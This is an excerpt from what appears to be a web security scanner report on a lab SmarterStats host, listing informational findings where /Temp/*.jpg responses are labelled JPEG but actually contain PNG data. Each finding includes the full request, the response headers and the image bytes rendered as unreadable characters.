The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/7b3c6e936ca34e63ab51c459ff492d1e.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:33 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8B4CAA00"
Content-Type: image/jpeg
Content-Length: 16586
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..@_IDATx^..    X.W...}3..t.L.LO:....l...w    *.1.....1{.....H.Q.]DD.7@qE..W...4...M.M...jb.=&....w......{.K...}..Q.nU..9u...l../. .. .. .. .C....w..#.. .. .. ........H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H..H..H...N..f.
....    ..    ..    ....m..H.'.\..6
.K.ce...f.-.>...}.&-F/........m.....&I..H@.......    ....s....YM.D..F...o$..!.h...<.#..e....8.......ut~..U<N.n;..W.&zS..]w_.%\..gCq....    X..........W    ..U..f!.....    .HX..S...s..M....-..q.h0t%..Z...w`A.    -+..    ..    x....[.y].. ...oj.#.3.l..yR........0..."s...-.'.........[..Yd. .o...y.:.I..!p..-.X3.R....&#.i.#.3G..(.K6N2q~.7..*..-}...7..i....E...-...    ...d.D..........f..
L..g%.6Y...Gl..M2.Rv. ..    ..    ......4y...0.......<.&...u./2...&o.9....    .. ..nS.?.,:    ......0y*.....I.......i...M;..K.YN...8.:.y...eF8..jO..K..%@as-O...,A@..K.IfR.......P.j..*.+...+.2.L$_$@.$.(.
...x<    X.....M....A2.D._...2.L..-'....o.nM,:    ..#.(l....$`Q..E.hc.z-<.n.Gj..    ..O'k.Iw.SA.......,.\..$...
.#.x,    X...E.{.1.0=..&f.u.
..L.s......u
9...].F..r.>.?Of.d.l.I{.l.j..>m......    8B....-.K..! ..l].....&../L...S+%R-.,@..gy%..3G........;...K.,..:r...c.,....$. .
...x8    .....&Ks.8+w......d.}D....B3%gF....a.......^...^&'...|..    ......m..H@# ]rMG....pG.`....4y'Z.N.d.|9........M.dr.,:<ji.....I.$.....!...    H&.SD..%......S$...K...XS...]..6f.&.k..-.JY|. .
...    X..,).......C.8.!{..9...3..M.j4o..B..S....:.....D....o..p6.E.U....ac. ...((.A...h...e;...R..&.....g.h1(^...+.#..[....lRNJ..C.b[..3l.o..`5..R..y.F.Z`...u.[..Kk>p.....F&X....&.I    #..q.].=.,..    P.,....*.d...Uk....y..w.m...d....Hw..2...u.....h.....Y....$`y..6.7......b....%c.4QS..(i.%.:F.h..9WWi..i..tLM/.B.f.I...(l.o..`v....i_...V.I(......Qg..BR..
...N.>.N..MH...f.Y>....Y.....%...../...]u...E.h.~.Z.N`..A..u.9..:..LH....Y..}.Y0..:ll.$`J...Z...!_.u......Hl....73...."....,.....;$...f.H...6@..#...E..n..,.^.Ni.......d ....r~.....hu/...E.$`....5W}.4.' ..&Bej.b..djd.c.....=>..a ......C.{..YH....,.q.......d...X..M.z/9.....w\[O....I.....dH.8#....".!z...} Xr.0..
..*...&....... .M0..@..rv...Sr)m..H`.MH..f.Je..E`[..Z7.3.5.vk?a....0..Y..gB.S.6J..>.XZ......nY2...qJ..ovJ.z-<.M,..^....#.;.n......,..    P.L_.,.Y    ...8%g.8u.s..p...e..c.e.s[.Q...I.rY....*5.r..@]d.y5&._ek.......N.z.....y.T...C.V!@a.JM...! kl....Y...sj..&......g .O8...de...i>.X.....Y..YT.' ;.......V*k.!KE0..@..
L....6J......#@a.^...>J@.....d5{G..I.F.1.F.0L.@......CmB..LV...|..    ...
.o.................s..Y..j..Q.`.0/.Y.C..sD.%K.b.z\..g.?],>    ...
.o.........qx#w....Y......-.v.vM8..c.!.!...H...(l.....    h+.....dO4YS...G.dX.A..t........0.O.    ...    P..^A.=k..<.6.~?.aYk....&cX.A..jR..b..L@..,.Vd....'........x{.% 3B...sh....!r.......d..#.&K........Y..c.I...(l.. ..u    t..@....eJ...CQ..jm@..w.'....>n......m...%'.......r,qk%....@.WY...[...b..k...E.o...
...G....\.Nq.C.......35..m'...e+....:...k.dP..:Fmu..,...7Y....$._#@a...3...JU....\
........
"V.w.....,o..M...{.......U_.k.dpO.xaz.C..0i7.n:.[....,@..f.J.."V#f.3n...a.Ar..R...+}.r....1..@.W.e.d....Be.T..(..3...6.c.q..I.. c'e.%_$@..!@a3N]X.ND.l]....jB.H....wm..6.69_.....o..o$.,..X.......F-.C.....\e`..Uj...A.5..m.B...2.5..G.'$.:.....!O.<......i.2l..Z:nM...'.V.[U$..!).........NY.~..}h...;..w.%..]B.q..eM2p...i.5...k.2{Xf...........]..y.. .......!..,.*..e...L..f.....V!.&.V1[..=.y.t........PP\.......<.1..3Q..Y]g...k.2...:O....l].t.j..u.Y..$....6w..yk P.K.bwh..........GK..>.t.i..jU.B...uW..D..v.8}....    _q.m.....\x......QX.n..b....u.q..g.p.=.$@..'@as=S..........9xr..u..Q....T[.k<b..Y...%].......m....#{......n..'.N.$P.........[.l0e\.....87{..J.C2.z..IW.d..d.l....u.7n..c...]......fY.C...."n.V......sO...,$]...,.!........}z..u..$m..E..A.. ......."OA.........H.......-`\:...........8i;.O.. .:...5.{.....L.i4<...".....
.w....$ .6.6Y
D.N.......S2!..*_..2pU..<u...'.bdr._$@..!@a..w^...dL[d.!<..R..xH&D..t..5.C......?.%m..B.aiv.dZ..f.I...(ln....@..d.F..Q..".....l....t...{A..3
.f\..k. ./...y.:/im.2.H...]$W.`................CW.^...O:KO..%@as-O.....X.{....uA...........$..g.g..$...}.y.    .....-XyR....#3Ce..... .w..ns...6..V`2g..C..<L...a....    8....xt...N.v0...m`.N..1z.Ur]6k....!@a..w^.............D.d..6.w.Q..t.
.>.,6    x....;.yU..8{...^.+.!Y......-b......2cTg..{.Z.C.E.*.
.W...V" ....m=]N....|y2...m@2.z.h......a.G.e%.....y.?/n..........z..eW..cv3...m@2.zg.J.X2.|..    .......y...#Ky.N.X.l. .o...    ........3..    '.....
.. ..$.}.&<..oqRY.T.^c....@...te.{,8.&.i|.I..<@........    ...O.I...(...KJ6.f..7.@`..]m.y.F...X.!g.I...(l...KX..#..............-.%lmc.`hb...r...<@........    .......}.u.u...;......L>.L..O..r..k.... @a..d^......=.T..zf..^.)E..j.6.k.i]Y6..-.|..u.t...<@.......u    ...Xm..U...t.v...A..i.....g.Kn<..6..    ..D....J6...y.20L.P].zv>.nQYg./. .......-.lq..,.+..2~.A.Fk.z.E......k..Y|.p..
......'...y.~.zv6..Jew...........Z....w;.
.....V%.....'.m~.F...[...:..A..l.zf.....@4_$@..!@as.W......e.l{.&c.(k.U#.....^;...S..df4_$@..'@as=S....5..n....N..{.A..m.....%l2.@...E.$.z..6.3..I@..G.......k.%. ...........
..    ...    P.\..g$.,......S......w. .#...c...    x......yu.........=.(.......c.zl&.@c..A..f.j.M....A+.3..n.M......u.20x....z....]..7.l.G..!.....y.
x.f# _V.....M...K.A.Fo...>...9..l.h,.Q.P..R......M.e3l=.&_.F....Q&...RW......(cA.F..f.
...>....h..[...|    ..?. ..h.._z.n..0..d.'_$@..%@as-O...041.mc...b..sE..d.+m@....9..p
~......H...(l.....@.i..8.....|....!..|....1.f.9<...~...    ......@y:....d..e"z'}.Y4.A........m........_....    ...    P.\...".! ...*.`_.>.l.. ._i.z....u8}.&?.H..\H...B.<.    HVA...dM~/.K.....2..6.w-6....B.p=.
......&p..54.I.-l... ._j.z.3"....l|..    .....u,y&..#k..&..... ._j.z....&..4$.......)Ohe...O./2G_.M.6...V....[.i.....+...$.r..6.#.    .L@...j.w... ._k..~..n..c....7Y...e'.......)Ohe....l.. ._k..6+....$@a.&}^.t.F/.G..|.....$..2.........q'.)".t.7.D..$@a.&}^.t..nK%.&.
...\....h..g.$8.t.7.D..$@a.&}^.t.(l.0..0G..@a3.......(l.QO.K.!..../>.^b../..=.z.L,..A+|..u.m.d..g.....Ur..%Y....c...w.-.....O.G..
..L<.......dI.{.....nQ.......-'.0.. r7Z....H.....(M.B.pW.J....-^S...Fa3qKpM.(l......F@.2.%..[_%m..3xAx..V.....a.....>xqP?t....x.?^xm.z........_Y.7...w.....oaX. ..>.<.G..w..`..A.C..j......<...1,
].L.\....1c..,..;.[.25
.1...AV..i...,[....w.q6.+-x..m4.}!.....e.*.N.Yu...|...=..+e.+f
+f    k..oU.o.-..7..w.#..
.&j...b.0i.B...k[...&.|..8..K...    rG..d..)f..w.../.....2...6.....0Fty.... ..#.]..$.z.<._....2.W.6..Z.X.;._.........r?............>2.=........F...,.....n.b...cAl.......c+E...X.d    V.X....jc........HHH@aa..|
....Oe.*..cJ.4.....'.."./...f..E....sTx_EJ5v..r>..U....
.#C.[5.......1/`%...M.Z....72h.....=........k.w!.1.M.....+....Y...c..a...._.o.c.:.!....&t....    ]X.z...).n...6k.E...b.#.h...1,n[O....#k.cZ.D=......$...;.    _.j.+G.W...>.39......5A._..{.qO..(....    b..G..D.F..E3;.#.".".I........%..l..r9...D....G..+.......U...0a.:...7.Q..[V011...Su.. l...^........e..t.V...I....
...M2.......,]...G.G.Ja..f^.*...a...D..nc.k..4.....:.NF'..uJs\..$.L.-
".S..mc..........a`.Sx#...2.    .~.......cx-.>..<..W.`^..X..    .u
..6m.....Z........r..,.M....`%xeqh~..HQ........l.:..~..%..k.3.. ....X}.q....#.YK..........Y.f..HJJ..)S,.a.M..v..Nb(...2[.
[.sH....n.iM.j..w....n.<.....%*]./..g..A...0`.x .y../+.pmQC....
&...#...F.36L.O...+..|.a.M0jwK..l.w.4.k.+...O.g......^O    .:.........}.i}[.t..Z...".S...z.9.".E#%y.h...c....P.x..H|\e.......Y..Z.Z+Y..n.N..l.Z..S..M...g_............u.....!}`W.].w..."oWW..'-..*.U~_.....H.....1ec......cU.K..O.....V.GG2lz..\m.].....U...    ...J........Va..h.....2m..o.....7.........7..a.....?.$nZr=L....O.."4._    ....o.    ..s...NdNBdNBd..CM...(.:..U...[.r..i..\....+...&O...t...O..8Xu..K6....Fe.....r @e.^....
.."?.\...l.\)......S*...|T.on~..'..SU.6%c).JOpm.....Q........w](.].X%n.    ..Q..,.J"Ve..32..|.d...U7....<V7.
.nT<....pD.^I=.....[v.M.,...n@V.....:.Vr.%q........RsG._M..M..f.I.1.."....D..H..V    ...xe..xy....u...&s..~R...W.!._.l..    g..q(.w..[ln.
Y..Z..l.`......Z.Z..Zy.R...3.U.1...>...U....-..^...@...j..Q.D...\..WUa.,aL)..U.7..U/l.5*v....J....?.e>dVfm....U.UZa....[.k.v>..M)i...v.r,......Aa..=.....H..1.#..Z....~Y.1.6.8:.M..%l...et.WJ...?.&7<...........H.~..q.b....:.$...<..!..1b....).S..$;.wJ=M..#..V%t.F>...."..f....}.....S../.|%y.9.: K$OE._.,m.&[.Hj\5.W:.").1....C...X.@[L.P.K..a.Y......[-..C.x..&@a3v...|....g...E...W..W..c.n.6L| .l....z.?./h..Y...D.v..    .....9...u0.P.&}..nD.i..{Z!8....m...?...)5!.t....2!.q..R."..%..R..#/...._t*N...S..W.y.{Vbc....4...^{.V...cs4..C.x..&@a3v...|.@Aq    ..n.%l.....+..b.?.s4.................q......*.............4b.<.....E..v....C.Zb...x#.!..y
....;!b...3..LPB..Rk....'...._z...M.l"...%....COo....|...x@.d.lc..w.0).M........3..P...:./.. ..c[J`..........    P..]=.9_#p..54.I.'l*...J.'..M:....p{cO............%>.[..D=.....=#er..k.7sI}.lk.....9....b..6...B...q4...s...%s......[..U..6..%>.4.v.....k.&....x....y....h)Qk._*^..+.z
.Sd......nd.y]L.........}.#..+...e.    .xl8N......&@a..........F..+u    [.a{]    ...........U.&..[.CF.|...$N-.1.....i]."q......=.i..1...K"47.....!."s/M._6!B    ........s1/7...j.9..Z..D....D.l..}.XM.$l..'......bW.Kt=.>..&e.$,....>o..
..........W........,..>.}..(l.Xk.gC.x..%....]i..Z....../0h....g...-.L._......(..;.x.?.&7..VM.%......?...k.C...._....CpN3....o.y.o.<.?.......v...Y.........n..]|.F..(.    .3.0V}.....h....2.j...-k..x.=p?...T[........f..y...(lN...I.z.....%.......o..............bUo%l......$.    >.-...zq..Q.c...`..F.Z..1E.t..f.    [m.T......>..QU..b[.-3V.w..........!    P..Y-.)_&.w{...n.o)Yax.A..G.+8...V.....N...9>.{....k..v..'d...4.K{.S....E.......+l..[....>..W.{........9*lj|....X....R.|..x.>D`A.    .E.....Q........-.....h...........p#....'..._a_.O.....5..i.o0{.......>.....v.m....?.)......g .`9.....~.....
"v5./....U4Q....1j..{i?....6.-...............sq.m.h..o.+>o...P.|..x.F'...y....K..\uQ-......W.G..%8..E`+....M....-..m.N...yj......%S......OV+o.mx...Fi..~".....[.i........1H....s..9/?.y...l....8..&a..|5.o...!....ko.w...........D.......+..l.j]....p.-Y.uKE..EEh7l.ng.I.J..50Pc.n-k.Kq...t......mS.p.M....~..5j..e.bk..j.F..&..sb.&l"o..w.f..K........}.E;.#/.1..{.VE.._..)l../._..f..g..G@.L..ji..k/1.......{?.....&.j.:llwO.%...,x....-
.X..#.....s........q.&l.7..dND........9.=/[F..;V..u.6I.P..~.p.....O......$.....):h.%0......._..m......}X....?.{z....)...w.....Xc....IV..{....s...7`B..6.V*..}.zg..U...*a...:.7R>A..    .2Cea.3.a.....I...9....:t.U.8....Q....j....D..~..%y0    8A....4.....H..1.#................c.a...`.Z\.q...~veM2m..>..6...x..."i...j..hBV:.T.t..E.    ....~n.b..LM..f..e..E..-.d.......0h3~=Rf.Ma.(.........p.(.[...K..&@a3u..p.$.$8=....e..|.C..0..`...h48.%._.v.`..M]u    ...?......c.k..i    P.L[.,..    .M.E...v.M........3.......q..`.k.a.c....-.R.....O..%@a3m..`.&.........oT..0.....bZ.P%l.[;d...vvC.g;.a...;^..LK..f..e..M.......d]..W.zl#..1..`x.E4.....U.).M....veM...............5..y.....dy.`
......b......j..]oZ2..Q..q..W?jxq....Y..YD...Xy.........V......`..g.!(,...f.Z-d=:........>.xe.p.....j|.    .$PP\....u    [.-:*.2...Z.......N.......C?....8.H.S..H...!@as...C.:    .......T.&}.K..[4$.a4.Ak.......Y    ..w-...........q?.r.:?.x.    8K...,9...t.._q.m..t    .......a<....E..S...g..vz...zsqC.....4.0. .g    P..%....N../.D...t    .K..cL....2.8!......=..l..K..L......4.0. .g    P..%..........Et.m...M_0.. $...Y...T...A...C...)...w.<<..H....6g..=$. ...Eh..KW.......d.aL..$.B..9..;....}te..,x...j&)_$@.n'@as;b^...._.F.ai....]i...s.]+A...Q......    c..A..%.z....mE1...3;....    x......y    ...o..A.i..
.t.....J...e.<8..K....C..:.^.~.?
..%.C..F.."@a..h^....]B.q...M.lcU.h..6.1..Xw.M.%...%l...#.|".y]..g....=s.`..    x....C.y....O..@..b].....El..00.W....1...`s..Wu....V...|..U>.$@.."@a..h^....#..$.....Dd.0...m.:....;J.|=....a...........H...(l...K...|.hx..,../...
...B3>G..E(..& .....yK..1...1....
.w....&.h.M..Q..-..S?B.a3U.m.... ...a.......c."...(.
.Gq.b$.8.e...lQ..2...G.vL...........Y..<
#..\>.G..H...(l.......p8..}..v\e..A...4...........m...*...A..1.../....
......&.h..u...d%+.c3......:....,..P.../..5..k..,....(l......    8.e..tGe|...W..g./v.B".)Y.k.P..........(....U....A..f.j.MX...Y..S.c..-Ii3....I..%Cp..8C..{..5.]..'..l4..6.....R.....2.1..1.. b..4..._.Rc....3r...5..f..%....(l.....5.H....ttM8.k.....\....2........2.w..7^....[P...5.L.5w5..G.Ki`..6.W.o...
.K.<t.na{%.<..\.4...t..    I...U..7Vd....q.Pk|....'@a3~...-@`..\t.vP..M...9W..g0y.e4...g.BpGI.!B...2n....(.~...;.<.,"    ............._..........F...3v_c..A....8|...L.~.._sM.....p.(."O!.I..&@a3v...,D`m^1ZO..;../.<.w\.L%,.c3.7g..&.....6....MwW.....G.5........    P..]?.;...3-..g.....V^.2l..0..`..+h=f..W.....^    l..nY....D..'...x.[...[.{.Y\.0..
....wda..o...G.F.%.tK..u.0'.O..3x?........H..$...!.eM.B.g=.+.K.'.......$n..a.'.E'.....y..x.$P...M..0i.na..l..J..]c.......nX$.(a.X...u..*.v%...S^..&...*...j!...H...(l.g.+.@..dm..QY..wB.....sm....b..A....f.h%l...Y.W.zkzf.J.M.m.u...H...(l.........5.j...f..W...8..JX..e..."Z.M..;.2....u..8..^7u............9..6*..d\.d.........H...N..Vw.<.    ......J...i.0[u........F.}.n#f(Y.qO......-k.];..8.....-..m.r..~.1......!...w.."...
...    .....ch...x6.6......00.^S.a.....3\.[_tH.n-k..s.;.$....m..cs...k.....o.....x...P.....I....0k.......l.L.H..<.Q...........0.).....W....V....zu.L ...3...mQ....d..u..Qea........e..=..R.....i..L.{.C.....?.xy=.(lz(....".on..........&Y...7..e...ct...o....Twd].AY...N.<..\>Y....6.6.7{...|...T..U'i.2/...k.)..d.]......=.(l......K    ..r..B.9.>.d..[{I..-...0(...y.=AM@8:.N............p.T.K..t.J..t.z|.R-....m%*..u.....V=.,.Fasi3...@.....<%    ....[W....M.l..0.......I.....xHVnG.e.......y.h..9e2..._`...\.'...x........(l......B..D...J.;..........(l...s...    D......:.5*.....HP..E.o0..`...h94._.....s..1%x..".*[.H\....m.vsk...K..I.....=....c..a.D...n @as.T....I.Yi{u...Q..(m.........j9....B.qN.....8.X-.a.W..*....DE...B.qj...f..%.c....,Q.
.%...4..q...>&..L..).1]m....M...t..D...J.....f....!..o.....&..[........V...,....Y......,Q.V    O....6.`.EH....-...3.9,m..U...XRp.a0........8.c2pR./...O....``.*.Kj3...,d...H..|.......wL.....6...K..0.. bc1:..ql..Z.H.6r.......C..f..dI,J...6l.emL...7..b.n.....>._."o;_shb.M..nPf.,...b.....L...X.@].m@.d..JX..`...u..JE....)[We.vJ.n.k..Yc7.e?.Xp......2Y.......la.~.^.....k...D..M>.%...f......|...iY;5...O0..3...@U..6.    .0...U........l.&...W..%..qcx.....1x.%.L....G;,lW.5.e.D.6.B........LF mo1..g!0.S..m...#b...~.%...".].,.b..f#Wb..........8./3k&{.Y.......        ..../t.....$A.|w.Em.....dx.......@..3..M./@IJ.Z.....(...>IS..."..0..
.....".R..a..zt.;.T..&.!......,.....)..9lKI.u.i.a..Vk.mlWm.^...&=.+.K..I..LJ..f..e.H@.|s.{t..B...u.6.&}?...J....0\. f.U.O...Y5.V....KG..W....K....'...'..I..LL..f..e.H@....7.r.z.V.'#....%..;.`../.u`0U.........K.....8.tw.....qjA'...G..,@..f.Jf.I@...+F..uu.".y{{.E....V+ia.g...
}....m...n.L|...NN~..v.`.&.....
.E*..$.! ..:Ed `.n..;5u....DSv^.&%.9.%....r.BX.....w-.e!|D_..t..5    ....P.,T.,*    ....t\e...5..K$B......S..._1.........DMf.....>..q..e6f. .....Y..Y\...8~..Z.MG..|.H.-C4|.em.]..[..?ad.....z.f..k....F....Kl.$@..%@a.h...$ .dB....Z..K|...C.D.......C7...W..e.7.....}Y...#..:.Lh..#.._.H...K..f..g.I...dn.....#.k..:".z..-....J....'o."..w........y..P.g(u".P.H..H...6@.$PN e.i..M..D........c"o.u...WJ.|#.^..^.../t...(.9...#h<b5d.!_$@.$`#@ac[ ...D@.......4..v.-.VQd$.6*..L...u.f|x..!...TFp...|..-......#..d.:.....o.....H..*....A..    TK........m.......n.ef..K.M..._A|.u$.P..N.G.D...r..M%.k.Z......7..I..H.Z..66.. .Z    .....7i.....=YzK-...~Y..I;...YvD.g.W]<A..}W.}...E..!    ..=..6{..{. .....d...]...r....G3Q.
.Q....."..p.....j|.    X.....^{.O...?b....5.`...z,8.I....QcF.....N.N...9    .o#....5.V.....5.:n.9r.....2.V...M..4Mr9...O.O.....9...$..(# ..I....d..o.D.]...].d.[.<>9$U.B...|LH..\A...
.<.    ..F@...|..&*....m....w..w.-#w.....b..y...|(H..\I...J.<.    .@9..2.y...[*o.7.ut.....F..k.).O........SD.b3....[l.$@.$....6.`.II.....y.<F/..2P"9.C7jY...
.}*..$S....O..N.......L".|..    ...    P..M..'.....HNAq....3-....D[._.~...B."I....5.."."g".....M..La...!.
.E.$@..&@a.4q^..H.Z.......1..zE.D.$.%.$..4.R]."UU..M.+.+.Y.<..*frm.I.3.J.H..H...(lF....    .@..$.%.$..D..+R..j<..B......2.U.c.....    ../....B-..I..H..H..,M..f..g.I..H..H..|.....j..H.$@.$@.$`i..6KW?.O.$@.$@.$...(l.PK.G. .. .. .K...Y..Yx. .. .. ._ @a..Z.=..    ..    ..    X..........    ..    ..    ...
./.....H..H..H...(l..~...H..H..H...P.|..x.$@.$@.$@..&@a.t...$@.$@.$@..@......{$.. .. ...4.
.....'.. .. ......6_.%.#    ..pa.....}UYT.yM'?. ...q..6..@.>    X...a.....-...%..0..
..j.e!.3..#l...C.}..>-J.r..u-..}.....I.l$@.&$@a3a..H$`J..    .fhw.P.Uj.&.B....P..T.,+    .2.M.lY....m.Q.J3n..j...H..|.....+..L..$P......Z.%z....M..&._&@a..........U..YI.....Vb....    ...
..U.o..,J....M8.e.8{....&..&@a.......u.8*l..e]m.Dm/....Q.4.....B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK..f..e.H..H..H...B..f..d9H..H..H..LK.....:x.H.s....IEND.B`.

10.31. http://vulnerable.smarterstats.6.0.host:9999/Temp/8494271a59234d898cdd787b473092ed.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/8494271a59234d898cdd787b473092ed.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/8494271a59234d898cdd787b473092ed.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 13037
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..2.IDATx^..y.U......q..w..q.#.e8b.x5.F4..%"...j4.&.T....%.4.X...=
...m.".4%.T
$..4..Gp.q...Z.......:{.S....o.1.I.s.Z.[k..s...j \.... ...@...&. ...r.... ...@...`..@...... ....@....... ...@...@... ...@....@.     ...@T...... ... ....... ...@ ...l.o ....@.......l...@...... .p....7..... ...@...6... ...@....8..[....A...... ....}...... .......-.D. ...@.......>...@.......N......z.... ...@..F.... ...@...'.`.x.Q=.@...... .`..@...... ....@....... ...@...@... ...@....@.     ...@T/..>;G..y.J.blQj.;.E:6.+;S[
w... ..4.@..    4..K@..............J.....
.-ul.3. .... .|.N.6.(...s..35|VAU5........5#c.>............L.U...7.: .B...!.`.HC.F@    ....]...eb.~.g.#r.>.....*.a5.V...E....jA....@%.......$."..z.Z"]*..    .*Q9...E.T...a.5..C.......'g$....@....I%Q...@.J..6+....F...[U.u.w...X.]&.b    ..6<.M..2M..(.L."y...p'n...@..U     ....H).....[..`s.....%.aK.......E.RW.w... `).......#..I.LXU.\..5l).Az.......... ...XB..fIC......f.<l..%:vK.k......K.th.a.l*.. ...@ y..l.c.. ./..F..q....2..x~.w!...@...........!j.......M...........G...<..    ..0.......s>.=......H...D..
..(#......<..:.... .(..[..... P'..U..... ...$...-9.... P..G._.6.W........D...$......N.Fs...g.... ....@...!w...j!.9{.,..1l ...@    ..lI..- ...    .XS...K73TX.Z9....Y..Mv.... ..T.@..........y.I.....J.....W.]#W?=K.|r.c..VT.m..I<v.....V.....N.Z.
?-...DZ..@...$.`K%]...    .....P...H...Pz`.zi...R.5..I...!.r.......9.Rb...t...T.. .y.7..t..U..?......,oM.....$.`..>eC ..F...<U/.p.7.l9...ZG(.3....|8%.,...ui>b.4....qWw.....9..1..~.{.."..[.[.:A ".42.@..Y..DzL..7vKnyq.#.4......7*.2..r..uFl.O.....tX..@.     ...8T.a&.B..!...O..&...]9.I.i...iu    .N3>u|R.T.=:v..+..oa......%.`.n.P3.......M.-.w"i*dtm....t..k.Z.....6...9...?;.......@p     ...6....!..4.4....%c..HE...}*.4....ri.g..uc.44]..B ...l.m.*..`....Qo.......x.M...fb..u.E.y......H..@....@.%B..@.b..B......C..5..ar........e..)J.v_].v...N.R...Jubq..u.@ .........D..PS..&T..y...8B..!........o:.........5.>..O.W.K.....k9...9..T...n.SVs..q...... `. .....@L...j.."....B.u........Pw.1u.s...].......o9../.}Q.X.........^...R=......@,..6... P'..j..g..-.l..v.>.{.ji.c.42.,.v[..&.......V.
:U....9..I    .`....".`.o@....(9{.9.@.Z.r.i..u.;rg."gZ...cCiZ.C.IV..Y.f..6zi.,.YL.... p.........$.........F.$.$.6.v..//.F..F....#.doL..7....78)R.&e`B..U     ......C@..f..\...n.#G.'......]...4.L.M.....&."E.I..18!..
..6...,'P.U.D..9|].w.;r...{..h....=gK....{..N..m.|p.>...@... `1.dE.tM.n.h.u.V.@7+...N:M....D.,.......}.......9>.>Q5.9y....4.X..n{~....>)B*.m....NR...,%@.....m{    ..h..;.Y.....iJ.M>.H..Tu=.F".........~+H.k...s.     .,n|\....<l..ZZ.x/!...d5..F....4......'!..FD#..f..}.g...x...     .,n|\....Wk.....ut......Fn.6.K......~..        7."m.o.....]..o!`1.........X.n.4..".$..G...f..........    M..)    ..ov... ....@.E....r.}...f...w...'3..n..b..
K-..fn?.`\.Sy....n7t..,....}.....1.ZL..)....]q.....Y.5U..>.-.mI(..*.@Z^.h.x..z.     ....xh)..k.F..K.iT..+K..?..|b... .h[..E.6K.:n.A..fG;..e...k.&.../.u..a.2...t.`<S..]D.e..w.".`...q6..4.......YSq.S........C..mQ........l.A.5.......Fm.{.}..%...Dw).X....y...iU....i..h.~.....-~f....#..X.<.c.5.m#.....@..v....-p#.
A }..l.cMI.H    .D.Z.......:.Ka.`.H.]"m).r.....@....B!.<..85...T..N.;.X.B...<i7. .H......NT.sA...%.`.o.Qs....Eq..^)..nP.......d7.#.4..&P.....K..........V..4...s......4..&J...A"..z..g.Z....P.@........J.^.&Yo....e..#.......XD....'..G..y..~v..a....5..[.....H..K....+......Z.W.;...h1P...h.0.X...L.y.......5..[.....H@..z...i....)..`.e..hk=....^.&......j...P7........z....JD..j...6....../.....#.H...m.>...P.@......M......Y+<........#.,.....3>..?T.e..$s.}d...W.....-..G.m!.9.n..X.O9....z.v3......=..D...H.nB..."9....2.....&.`.u.Qy[..4{..........}...R.R................e..'.BM.......6..QtRn..-.Z.I.rW.e.....~..hcj....>F...-
....%.)<...H4...4W.i....4bm9f9.].......~..hd..8.1....5(.D......}^^.-....loc0p.....z....h...x.M...h.+^E.@<S.:..Q...U.@...z........."O....&..0..]._X.i*..........P..5.....8.!.O
.l....M....!0cS.....St..k[..WWa0......N:..v....vJ....f.PQ..D..fSk.k(...]k7..'... V.......xDPIK     .,mx........]C.q...T.FOtq9...>.~.A.>..[5*_...9....A.R..6K....I.....W\..Zp...Q..l.....{.l.|
